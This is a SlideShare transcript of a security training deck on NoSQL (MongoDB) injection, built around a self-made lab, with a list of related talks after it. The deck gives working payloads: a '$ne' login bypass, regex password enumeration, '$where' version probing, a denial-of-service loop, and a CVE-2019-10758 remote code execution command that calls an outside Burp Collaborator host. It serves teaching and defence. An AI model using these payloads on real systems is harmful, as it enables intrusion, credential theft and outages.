SlideShare une entreprise Scribd logo
1  sur  24
Télécharger pour lire hors ligne
NoSql Injection
By Husseni Muzkkir
Date: 23/04/2020
Venue: Net Square
#TechieThursday
#WHOAMI
Security Analyst
LinkedIn @hussenimuzkkir
Twitter @MuzkkirHusseni
Muzkkir H.
Agenda
SQL vs NoSQL Databases
NoSQL Injection
LAB Creation
LAB Walkthrough
Insecure Coding and secure coding
CVE and exploits
Why NoSql Database ?
A relational database may require vertical and, sometimes horizontal expansion
of servers. What you require is a very agile delivery system that is easily
able to processes unstructured data. The system of engagement would need to be
extremely dynamic.
NoSQL allows for high-performance, agile processing of information at massive
scale. It stores unstructured data across multiple processing nodes, as well
as across multiple servers.
1. Key value Stores —> Riak, Voldemort, and Redis
2. Wide Column Stores —> Cassandra and HBase.
3. Document databases —> MongoDB and CouchDB.
4. Graph databases —> Neo4J and HyperGraphDB.
Data Store in SQL vs NoSQL
[ { "id" : 1,
"username" : "admin",
"password" : "P@$$w0rD",
"2FA" : "Enable" },
{ "id" : 2,
"username" : "user1",
"password" : "123456" },
{ "id" : 3,
"username" : "user2" } ]
id username password 2FA
1 admin P@$$w0rD Enable
2 user1 123456 null
3 user2 null null
SQL Database NoSQL Database
Query Structure
SQL:
SELECT * FROM table WHERE username = ‘$username’ AND password = ‘$password’
NoSQL:
db.collection.find({username: “$username”, password: “$password”});
Query Operators in NoSQL:
$ne -> not equal
$gt -> greater than
$regex -> regular expression
$where -> clause lets you specify a script to filter results
NoSQL Injection
NoSQL Injection is security vulnerability that lets attackers take control
of database queries through the unsafe use of user input. It can be used
by an attacker to: Expose unauthorized information. Modify data.
➢ db.items.find(queryObject)
○ db — current database object
○ Items — collection names ‘items’ in the current database
○ find — method to execute on the collection
○ queryObject — an object used to select data
LAB Creation
In this NoSQL Lab, I have implemented lab with actual and possible attack
scenarios.
1
VM LAB
Use Alpine or Ubuntu system
as per requirement.
Installed Dependencies
MongoDB and NodeJS
Installation.
2
Build Code
Create possible scenarios of
attack and write the code.
3
Run & Test
Deploy the code and try to
bypass the mechanism.
4
LAB Walkthrough
Possible Attack Vectors:
Authentication Bypass
Enumeration
Data manipulation
MongoDB Injection
DOS and more.
Authentication Bypass
id={"$ne":0}&email=muzkkir%40net-square.com&password=
","password":{"$ne":0},"email":"muzkkir@net-square.com
Authentication Bypass
Backend query will be:
{id: {"$ne":0}, email: "muzkkir%40net-square.com", password: "", "password": {"$ne":0},
"email": "muzkkir@net-square.com" }
Reason:
var query = "{ "_id" : "+id+","email": ""+email+"" , "password" : ""+password+"" }";
Fix:
Var query = { “_id” : id , ” email” : email , “password” : password }
Enumeration of Password
id={"$ne":0}&email=muzkkir%40net-square.com&password=","p
assword":{"$regex":"n*"},"email":"muzkkir@net-square.com
Enumeration of Password
"Password" : { "$regex" : "n*" }
"Password" : { "$regex" : "n8K*" }
"Password" : { "$regex" : "n8K!3*" }
"Password" : { "$regex" : "n8K!3p6" }
Enumerating other users password:
id={"$ne":0}&email=ravi%40net-square.com&password=","password":{"$regex":""}
,"email":"ravi@net-square.com
MongoDB Injection
MongoDB Injection
{ "$where": "1==1"}
MongoDB Injection
{"$where":"function(){return(version().length=='5');}"}
{ "$where" : "function(){ return( version()[0] == '3' );}" }
{ "$where" : "function(){ return( version()[1] == '.' );}" }
{ "$where" : "function(){ return( version()[2] == '6' );}" }
{ "$where" : "function(){ return( version()[3] == '.' );}" }
{ "$where" : "function(){ return( version()[4] == '8' );}" }
Version = “3.6.8”
Other Functions:
sleep(500) -> Delay 5 seconds in response
If else condition -> run function to retrieve more information
Var i=1;while(1){use i=i+1} -> Resource Exhaustion (DOS)
MongoDB Injection
Data Injecting to change password
Data Injecting to change password
email=muzkkir@net-square.com&time=2:34:42","password":"123456
Insecure Code
Secure Code
Console Logs
InSecure Coding Query…
Secure Coding Query...
CVE-2019-10758
Vulnerability: mongo-express@0.53.0
Exploit: curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic
YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return
process")().mainModule.require("child_process").execSync("curl
http://cvbytcxi73hi1p93tya3ubmcm3stgi.burpcollaborator.net")'
Thanks!!
hussenimuzkkir
MuzkkirHusseni
Muzkkir H.
Net Square

Contenu connexe

Tendances

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSMike Felch
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokensOWASP
 
Hacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitHacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitChris Gates
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Rest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API SecurityRest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API SecurityMohammed Fazuluddin
 
The Sysdig Secure DevOps Platform
The Sysdig Secure DevOps PlatformThe Sysdig Secure DevOps Platform
The Sysdig Secure DevOps PlatformAshnikbiz
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 

Tendances (20)

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
JSON WEB TOKEN
JSON WEB TOKENJSON WEB TOKEN
JSON WEB TOKEN
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWS
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
 
Json Web Token - JWT
Json Web Token - JWTJson Web Token - JWT
Json Web Token - JWT
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens
 
OpenID Connect Explained
OpenID Connect ExplainedOpenID Connect Explained
OpenID Connect Explained
 
Jwt Security
Jwt SecurityJwt Security
Jwt Security
 
Hacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitHacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With Metasploit
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Rest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API SecurityRest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API Security
 
Http security response headers
Http security response headers Http security response headers
Http security response headers
 
The Sysdig Secure DevOps Platform
The Sysdig Secure DevOps PlatformThe Sysdig Secure DevOps Platform
The Sysdig Secure DevOps Platform
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
JSON Web Token
JSON Web TokenJSON Web Token
JSON Web Token
 

Similaire à NoSql Injection

NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?Gavin Holt
 
MySQL Without the SQL -- Oh My!
MySQL Without the SQL -- Oh My!MySQL Without the SQL -- Oh My!
MySQL Without the SQL -- Oh My!Data Con LA
 
Datacon LA - MySQL without the SQL - Oh my!
Datacon LA - MySQL without the SQL - Oh my! Datacon LA - MySQL without the SQL - Oh my!
Datacon LA - MySQL without the SQL - Oh my! Dave Stokes
 
MySQL Without the SQL - Oh My! August 2nd presentation at Mid Atlantic Develo...
MySQL Without the SQL - Oh My! August 2nd presentation at Mid Atlantic Develo...MySQL Without the SQL - Oh My! August 2nd presentation at Mid Atlantic Develo...
MySQL Without the SQL - Oh My! August 2nd presentation at Mid Atlantic Develo...Dave Stokes
 
Json within a relational database
Json within a relational databaseJson within a relational database
Json within a relational databaseDave Stokes
 
MySQL Document Store -- SCaLE 17x Presentation
MySQL Document Store -- SCaLE 17x PresentationMySQL Document Store -- SCaLE 17x Presentation
MySQL Document Store -- SCaLE 17x PresentationDave Stokes
 
Open Source World June '21 -- JSON Within a Relational Database
Open Source World June '21 -- JSON Within a Relational DatabaseOpen Source World June '21 -- JSON Within a Relational Database
Open Source World June '21 -- JSON Within a Relational DatabaseDave Stokes
 
MySQL Without the SQL - Oh My! -> MySQL Document Store -- Confoo.CA 2019
MySQL Without the SQL - Oh My! -> MySQL Document Store -- Confoo.CA 2019MySQL Without the SQL - Oh My! -> MySQL Document Store -- Confoo.CA 2019
MySQL Without the SQL - Oh My! -> MySQL Document Store -- Confoo.CA 2019Dave Stokes
 
Web Security Threats and Solutions
Web Security Threats and Solutions Web Security Threats and Solutions
Web Security Threats and Solutions Ivo Andreev
 
Data Integration through Data Virtualization (SQL Server Konferenz 2019)
Data Integration through Data Virtualization (SQL Server Konferenz 2019)Data Integration through Data Virtualization (SQL Server Konferenz 2019)
Data Integration through Data Virtualization (SQL Server Konferenz 2019)Cathrine Wilhelmsen
 
Nosql why and how on Microsoft Azure
Nosql why and how on Microsoft AzureNosql why and how on Microsoft Azure
Nosql why and how on Microsoft AzureVito Flavio Lorusso
 
Webinaire 2 de la série « Retour aux fondamentaux » : Votre première applicat...
Webinaire 2 de la série « Retour aux fondamentaux » : Votre première applicat...Webinaire 2 de la série « Retour aux fondamentaux » : Votre première applicat...
Webinaire 2 de la série « Retour aux fondamentaux » : Votre première applicat...MongoDB
 
Accra MongoDB User Group
Accra MongoDB User GroupAccra MongoDB User Group
Accra MongoDB User GroupMongoDB
 
MySQL without the SQL -- Cascadia PHP
MySQL without the SQL -- Cascadia PHPMySQL without the SQL -- Cascadia PHP
MySQL without the SQL -- Cascadia PHPDave Stokes
 
Connecting to my sql using PHP
Connecting to my sql using PHPConnecting to my sql using PHP
Connecting to my sql using PHPNisa Soomro
 
Slides: Moving from a Relational Model to NoSQL
Slides: Moving from a Relational Model to NoSQLSlides: Moving from a Relational Model to NoSQL
Slides: Moving from a Relational Model to NoSQLDATAVERSITY
 
Discover the Power of the NoSQL + SQL with MySQL
Discover the Power of the NoSQL + SQL with MySQLDiscover the Power of the NoSQL + SQL with MySQL
Discover the Power of the NoSQL + SQL with MySQLDave Stokes
 
Discover The Power of NoSQL + MySQL with MySQL
Discover The Power of NoSQL + MySQL with MySQLDiscover The Power of NoSQL + MySQL with MySQL
Discover The Power of NoSQL + MySQL with MySQLDave Stokes
 
NoSQL Now! Webinar Series: Innovations in NoSQL Query Languages
NoSQL Now! Webinar Series: Innovations in NoSQL Query Languages  NoSQL Now! Webinar Series: Innovations in NoSQL Query Languages
NoSQL Now! Webinar Series: Innovations in NoSQL Query Languages DATAVERSITY
 

Similaire à NoSql Injection (20)

NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?
 
MySQL Without the SQL -- Oh My!
MySQL Without the SQL -- Oh My!MySQL Without the SQL -- Oh My!
MySQL Without the SQL -- Oh My!
 
Datacon LA - MySQL without the SQL - Oh my!
Datacon LA - MySQL without the SQL - Oh my! Datacon LA - MySQL without the SQL - Oh my!
Datacon LA - MySQL without the SQL - Oh my!
 
MySQL Without the SQL - Oh My! August 2nd presentation at Mid Atlantic Develo...
MySQL Without the SQL - Oh My! August 2nd presentation at Mid Atlantic Develo...MySQL Without the SQL - Oh My! August 2nd presentation at Mid Atlantic Develo...
MySQL Without the SQL - Oh My! August 2nd presentation at Mid Atlantic Develo...
 
Json within a relational database
Json within a relational databaseJson within a relational database
Json within a relational database
 
MySQL Document Store -- SCaLE 17x Presentation
MySQL Document Store -- SCaLE 17x PresentationMySQL Document Store -- SCaLE 17x Presentation
MySQL Document Store -- SCaLE 17x Presentation
 
Open Source World June '21 -- JSON Within a Relational Database
Open Source World June '21 -- JSON Within a Relational DatabaseOpen Source World June '21 -- JSON Within a Relational Database
Open Source World June '21 -- JSON Within a Relational Database
 
MySQL Without the SQL - Oh My! -> MySQL Document Store -- Confoo.CA 2019
MySQL Without the SQL - Oh My! -> MySQL Document Store -- Confoo.CA 2019MySQL Without the SQL - Oh My! -> MySQL Document Store -- Confoo.CA 2019
MySQL Without the SQL - Oh My! -> MySQL Document Store -- Confoo.CA 2019
 
Web Security Threats and Solutions
Web Security Threats and Solutions Web Security Threats and Solutions
Web Security Threats and Solutions
 
Data Integration through Data Virtualization (SQL Server Konferenz 2019)
Data Integration through Data Virtualization (SQL Server Konferenz 2019)Data Integration through Data Virtualization (SQL Server Konferenz 2019)
Data Integration through Data Virtualization (SQL Server Konferenz 2019)
 
Nosql why and how on Microsoft Azure
Nosql why and how on Microsoft AzureNosql why and how on Microsoft Azure
Nosql why and how on Microsoft Azure
 
Webinaire 2 de la série « Retour aux fondamentaux » : Votre première applicat...
Webinaire 2 de la série « Retour aux fondamentaux » : Votre première applicat...Webinaire 2 de la série « Retour aux fondamentaux » : Votre première applicat...
Webinaire 2 de la série « Retour aux fondamentaux » : Votre première applicat...
 
Accra MongoDB User Group
Accra MongoDB User GroupAccra MongoDB User Group
Accra MongoDB User Group
 
MySQL without the SQL -- Cascadia PHP
MySQL without the SQL -- Cascadia PHPMySQL without the SQL -- Cascadia PHP
MySQL without the SQL -- Cascadia PHP
 
Connecting to my sql using PHP
Connecting to my sql using PHPConnecting to my sql using PHP
Connecting to my sql using PHP
 
Slides: Moving from a Relational Model to NoSQL
Slides: Moving from a Relational Model to NoSQLSlides: Moving from a Relational Model to NoSQL
Slides: Moving from a Relational Model to NoSQL
 
Discover the Power of the NoSQL + SQL with MySQL
Discover the Power of the NoSQL + SQL with MySQLDiscover the Power of the NoSQL + SQL with MySQL
Discover the Power of the NoSQL + SQL with MySQL
 
Discover The Power of NoSQL + MySQL with MySQL
Discover The Power of NoSQL + MySQL with MySQLDiscover The Power of NoSQL + MySQL with MySQL
Discover The Power of NoSQL + MySQL with MySQL
 
NoSQL Now! Webinar Series: Innovations in NoSQL Query Languages
NoSQL Now! Webinar Series: Innovations in NoSQL Query Languages  NoSQL Now! Webinar Series: Innovations in NoSQL Query Languages
NoSQL Now! Webinar Series: Innovations in NoSQL Query Languages
 
harry presentation
harry presentationharry presentation
harry presentation
 

Plus de NSConclave

RED-TEAM_Conclave
RED-TEAM_ConclaveRED-TEAM_Conclave
RED-TEAM_ConclaveNSConclave
 
Create a Custom Plugin in Burp Suite using the Extension
Create a Custom Plugin in Burp Suite using the ExtensionCreate a Custom Plugin in Burp Suite using the Extension
Create a Custom Plugin in Burp Suite using the ExtensionNSConclave
 
IOT SECURITY ASSESSMENT Pentester's Approach
IOT SECURITY ASSESSMENT Pentester's ApproachIOT SECURITY ASSESSMENT Pentester's Approach
IOT SECURITY ASSESSMENT Pentester's ApproachNSConclave
 
Debugging Android Native Library
Debugging Android Native LibraryDebugging Android Native Library
Debugging Android Native LibraryNSConclave
 
Burp Suite Extension Development
Burp Suite Extension DevelopmentBurp Suite Extension Development
Burp Suite Extension DevelopmentNSConclave
 
Regular Expression Injection
Regular Expression InjectionRegular Expression Injection
Regular Expression InjectionNSConclave
 
HTML5 Messaging (Post Message)
HTML5 Messaging (Post Message)HTML5 Messaging (Post Message)
HTML5 Messaging (Post Message)NSConclave
 
Node.js Deserialization
Node.js DeserializationNode.js Deserialization
Node.js DeserializationNSConclave
 
LDAP Injection
LDAP InjectionLDAP Injection
LDAP InjectionNSConclave
 
Python Deserialization Attacks
Python Deserialization AttacksPython Deserialization Attacks
Python Deserialization AttacksNSConclave
 
Thick Client Testing Advanced
Thick Client Testing AdvancedThick Client Testing Advanced
Thick Client Testing AdvancedNSConclave
 
Thick Client Testing Basics
Thick Client Testing BasicsThick Client Testing Basics
Thick Client Testing BasicsNSConclave
 
Security Architecture Consulting - Hiren Shah
Security Architecture Consulting - Hiren ShahSecurity Architecture Consulting - Hiren Shah
Security Architecture Consulting - Hiren ShahNSConclave
 
OSINT: Open Source Intelligence - Rohan Braganza
OSINT: Open Source Intelligence - Rohan BraganzaOSINT: Open Source Intelligence - Rohan Braganza
OSINT: Open Source Intelligence - Rohan BraganzaNSConclave
 
Lets get started with car hacking - Ankit Joshi
Lets get started with car hacking - Ankit JoshiLets get started with car hacking - Ankit Joshi
Lets get started with car hacking - Ankit JoshiNSConclave
 
Advanced Wireless Reconnaissance And Testing - Rohit Jadav
Advanced Wireless Reconnaissance And Testing - Rohit JadavAdvanced Wireless Reconnaissance And Testing - Rohit Jadav
Advanced Wireless Reconnaissance And Testing - Rohit JadavNSConclave
 

Plus de NSConclave (20)

RED-TEAM_Conclave
RED-TEAM_ConclaveRED-TEAM_Conclave
RED-TEAM_Conclave
 
Create a Custom Plugin in Burp Suite using the Extension
Create a Custom Plugin in Burp Suite using the ExtensionCreate a Custom Plugin in Burp Suite using the Extension
Create a Custom Plugin in Burp Suite using the Extension
 
IOT SECURITY ASSESSMENT Pentester's Approach
IOT SECURITY ASSESSMENT Pentester's ApproachIOT SECURITY ASSESSMENT Pentester's Approach
IOT SECURITY ASSESSMENT Pentester's Approach
 
Debugging Android Native Library
Debugging Android Native LibraryDebugging Android Native Library
Debugging Android Native Library
 
Burp Suite Extension Development
Burp Suite Extension DevelopmentBurp Suite Extension Development
Burp Suite Extension Development
 
Log Analysis
Log AnalysisLog Analysis
Log Analysis
 
Regular Expression Injection
Regular Expression InjectionRegular Expression Injection
Regular Expression Injection
 
HTML5 Messaging (Post Message)
HTML5 Messaging (Post Message)HTML5 Messaging (Post Message)
HTML5 Messaging (Post Message)
 
Node.js Deserialization
Node.js DeserializationNode.js Deserialization
Node.js Deserialization
 
LDAP Injection
LDAP InjectionLDAP Injection
LDAP Injection
 
Python Deserialization Attacks
Python Deserialization AttacksPython Deserialization Attacks
Python Deserialization Attacks
 
Sandboxing
SandboxingSandboxing
Sandboxing
 
Thick Client Testing Advanced
Thick Client Testing AdvancedThick Client Testing Advanced
Thick Client Testing Advanced
 
Thick Client Testing Basics
Thick Client Testing BasicsThick Client Testing Basics
Thick Client Testing Basics
 
Markdown
MarkdownMarkdown
Markdown
 
Docker 101
Docker 101Docker 101
Docker 101
 
Security Architecture Consulting - Hiren Shah
Security Architecture Consulting - Hiren ShahSecurity Architecture Consulting - Hiren Shah
Security Architecture Consulting - Hiren Shah
 
OSINT: Open Source Intelligence - Rohan Braganza
OSINT: Open Source Intelligence - Rohan BraganzaOSINT: Open Source Intelligence - Rohan Braganza
OSINT: Open Source Intelligence - Rohan Braganza
 
Lets get started with car hacking - Ankit Joshi
Lets get started with car hacking - Ankit JoshiLets get started with car hacking - Ankit Joshi
Lets get started with car hacking - Ankit Joshi
 
Advanced Wireless Reconnaissance And Testing - Rohit Jadav
Advanced Wireless Reconnaissance And Testing - Rohit JadavAdvanced Wireless Reconnaissance And Testing - Rohit Jadav
Advanced Wireless Reconnaissance And Testing - Rohit Jadav
 

Dernier

VuNet software organisation powerpoint deck
VuNet software organisation powerpoint deckVuNet software organisation powerpoint deck
VuNet software organisation powerpoint deckNaval Singh
 
If your code could speak, what would it tell you? Let GitHub Copilot Chat hel...
If your code could speak, what would it tell you? Let GitHub Copilot Chat hel...If your code could speak, what would it tell you? Let GitHub Copilot Chat hel...
If your code could speak, what would it tell you? Let GitHub Copilot Chat hel...Maxim Salnikov
 
8 Steps to Build a LangChain RAG Chatbot.
8 Steps to Build a LangChain RAG Chatbot.8 Steps to Build a LangChain RAG Chatbot.
8 Steps to Build a LangChain RAG Chatbot.Ritesh Kanjee
 
Enterprise Content Managements Solutions
Enterprise Content Managements SolutionsEnterprise Content Managements Solutions
Enterprise Content Managements SolutionsIQBG inc
 
renewable energy renewable energy renewable energy renewable energy
renewable energy renewable energy renewable energy  renewable energyrenewable energy renewable energy renewable energy  renewable energy
renewable energy renewable energy renewable energy renewable energyjeyasrig
 
Boost Efficiency: Sabre API Integration Made Easy
Boost Efficiency: Sabre API Integration Made EasyBoost Efficiency: Sabre API Integration Made Easy
Boost Efficiency: Sabre API Integration Made Easymichealwillson701
 
03.2024_North America VMUG Optimizing RevOps using the power of ChatGPT in Ma...
03.2024_North America VMUG Optimizing RevOps using the power of ChatGPT in Ma...03.2024_North America VMUG Optimizing RevOps using the power of ChatGPT in Ma...
03.2024_North America VMUG Optimizing RevOps using the power of ChatGPT in Ma...jackiepotts6
 
BATbern52 Swisscom's Journey into Data Mesh
BATbern52 Swisscom's Journey into Data MeshBATbern52 Swisscom's Journey into Data Mesh
BATbern52 Swisscom's Journey into Data MeshBATbern
 
Steps to Successfully Hire Ionic Developers
Steps to Successfully Hire Ionic DevelopersSteps to Successfully Hire Ionic Developers
Steps to Successfully Hire Ionic Developersmichealwillson701
 
MUT4SLX: Extensions for Mutation Testing of Stateflow Models
MUT4SLX: Extensions for Mutation Testing of Stateflow ModelsMUT4SLX: Extensions for Mutation Testing of Stateflow Models
MUT4SLX: Extensions for Mutation Testing of Stateflow ModelsUniversity of Antwerp
 
Mobile App Development company Houston
Mobile  App  Development  company HoustonMobile  App  Development  company Houston
Mobile App Development company Houstonjennysmithusa549
 
Practical Advice for FDA’s 510(k) Requirements.pdf
Practical Advice for FDA’s 510(k) Requirements.pdfPractical Advice for FDA’s 510(k) Requirements.pdf
Practical Advice for FDA’s 510(k) Requirements.pdfICS
 
Technical improvements. Reasons. Methods. Estimations. CJ
Technical improvements.  Reasons. Methods. Estimations. CJTechnical improvements.  Reasons. Methods. Estimations. CJ
Technical improvements. Reasons. Methods. Estimations. CJpolinaucc
 
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptx
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptxCYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptx
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptxBarakaMuyengi
 
Flutter the Future of Mobile App Development - 5 Crucial Reasons.pdf
Flutter the Future of Mobile App Development - 5 Crucial Reasons.pdfFlutter the Future of Mobile App Development - 5 Crucial Reasons.pdf
Flutter the Future of Mobile App Development - 5 Crucial Reasons.pdfMind IT Systems
 
Telebu Social -Whatsapp Business API : Mastering Omnichannel Business Communi...
Telebu Social -Whatsapp Business API : Mastering Omnichannel Business Communi...Telebu Social -Whatsapp Business API : Mastering Omnichannel Business Communi...
Telebu Social -Whatsapp Business API : Mastering Omnichannel Business Communi...telebusocialmarketin
 
Large Scale Architecture -- The Unreasonable Effectiveness of Simplicity
Large Scale Architecture -- The Unreasonable Effectiveness of SimplicityLarge Scale Architecture -- The Unreasonable Effectiveness of Simplicity
Large Scale Architecture -- The Unreasonable Effectiveness of SimplicityRandy Shoup
 
Mobile App Development process | Expert Tips
Mobile App Development process | Expert TipsMobile App Development process | Expert Tips
Mobile App Development process | Expert Tipsmichealwillson701
 
User Experience Designer | Kaylee Miller Resume
User Experience Designer | Kaylee Miller ResumeUser Experience Designer | Kaylee Miller Resume
User Experience Designer | Kaylee Miller ResumeKaylee Miller
 

Dernier (20)

VuNet software organisation powerpoint deck
VuNet software organisation powerpoint deckVuNet software organisation powerpoint deck
VuNet software organisation powerpoint deck
 
If your code could speak, what would it tell you? Let GitHub Copilot Chat hel...
If your code could speak, what would it tell you? Let GitHub Copilot Chat hel...If your code could speak, what would it tell you? Let GitHub Copilot Chat hel...
If your code could speak, what would it tell you? Let GitHub Copilot Chat hel...
 
8 Steps to Build a LangChain RAG Chatbot.
8 Steps to Build a LangChain RAG Chatbot.8 Steps to Build a LangChain RAG Chatbot.
8 Steps to Build a LangChain RAG Chatbot.
 
20140812 - OBD2 Solution
20140812 - OBD2 Solution20140812 - OBD2 Solution
20140812 - OBD2 Solution
 
Enterprise Content Managements Solutions
Enterprise Content Managements SolutionsEnterprise Content Managements Solutions
Enterprise Content Managements Solutions
 
renewable energy renewable energy renewable energy renewable energy
renewable energy renewable energy renewable energy  renewable energyrenewable energy renewable energy renewable energy  renewable energy
renewable energy renewable energy renewable energy renewable energy
 
Boost Efficiency: Sabre API Integration Made Easy
Boost Efficiency: Sabre API Integration Made EasyBoost Efficiency: Sabre API Integration Made Easy
Boost Efficiency: Sabre API Integration Made Easy
 
03.2024_North America VMUG Optimizing RevOps using the power of ChatGPT in Ma...
03.2024_North America VMUG Optimizing RevOps using the power of ChatGPT in Ma...03.2024_North America VMUG Optimizing RevOps using the power of ChatGPT in Ma...
03.2024_North America VMUG Optimizing RevOps using the power of ChatGPT in Ma...
 
BATbern52 Swisscom's Journey into Data Mesh
BATbern52 Swisscom's Journey into Data MeshBATbern52 Swisscom's Journey into Data Mesh
BATbern52 Swisscom's Journey into Data Mesh
 
Steps to Successfully Hire Ionic Developers
Steps to Successfully Hire Ionic DevelopersSteps to Successfully Hire Ionic Developers
Steps to Successfully Hire Ionic Developers
 
MUT4SLX: Extensions for Mutation Testing of Stateflow Models
MUT4SLX: Extensions for Mutation Testing of Stateflow ModelsMUT4SLX: Extensions for Mutation Testing of Stateflow Models
MUT4SLX: Extensions for Mutation Testing of Stateflow Models
 
Mobile App Development company Houston
Mobile  App  Development  company HoustonMobile  App  Development  company Houston
Mobile App Development company Houston
 
Practical Advice for FDA’s 510(k) Requirements.pdf
Practical Advice for FDA’s 510(k) Requirements.pdfPractical Advice for FDA’s 510(k) Requirements.pdf
Practical Advice for FDA’s 510(k) Requirements.pdf
 
Technical improvements. Reasons. Methods. Estimations. CJ
Technical improvements.  Reasons. Methods. Estimations. CJTechnical improvements.  Reasons. Methods. Estimations. CJ
Technical improvements. Reasons. Methods. Estimations. CJ
 
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptx
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptxCYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptx
CYBER SECURITY AND CYBER CRIME COMPLETE GUIDE.pLptx
 
Flutter the Future of Mobile App Development - 5 Crucial Reasons.pdf
Flutter the Future of Mobile App Development - 5 Crucial Reasons.pdfFlutter the Future of Mobile App Development - 5 Crucial Reasons.pdf
Flutter the Future of Mobile App Development - 5 Crucial Reasons.pdf
 
Telebu Social -Whatsapp Business API : Mastering Omnichannel Business Communi...
Telebu Social -Whatsapp Business API : Mastering Omnichannel Business Communi...Telebu Social -Whatsapp Business API : Mastering Omnichannel Business Communi...
Telebu Social -Whatsapp Business API : Mastering Omnichannel Business Communi...
 
Large Scale Architecture -- The Unreasonable Effectiveness of Simplicity
Large Scale Architecture -- The Unreasonable Effectiveness of SimplicityLarge Scale Architecture -- The Unreasonable Effectiveness of Simplicity
Large Scale Architecture -- The Unreasonable Effectiveness of Simplicity
 
Mobile App Development process | Expert Tips
Mobile App Development process | Expert TipsMobile App Development process | Expert Tips
Mobile App Development process | Expert Tips
 
User Experience Designer | Kaylee Miller Resume
User Experience Designer | Kaylee Miller ResumeUser Experience Designer | Kaylee Miller Resume
User Experience Designer | Kaylee Miller Resume
 

NoSql Injection

  • 1. NoSql Injection By Husseni Muzkkir Date: 23/04/2020 Venue: Net Square #TechieThursday
  • 3. Agenda SQL vs NoSQL Databases NoSQL Injection LAB Creation LAB Walkthrough Insecure Coding and secure coding CVE and exploits
  • 4. Why NoSql Database ? A relational database may require vertical and, sometimes horizontal expansion of servers. What you require is a very agile delivery system that is easily able to processes unstructured data. The system of engagement would need to be extremely dynamic. NoSQL allows for high-performance, agile processing of information at massive scale. It stores unstructured data across multiple processing nodes, as well as across multiple servers. 1. Key value Stores —> Riak, Voldemort, and Redis 2. Wide Column Stores —> Cassandra and HBase. 3. Document databases —> MongoDB and CouchDB. 4. Graph databases —> Neo4J and HyperGraphDB.
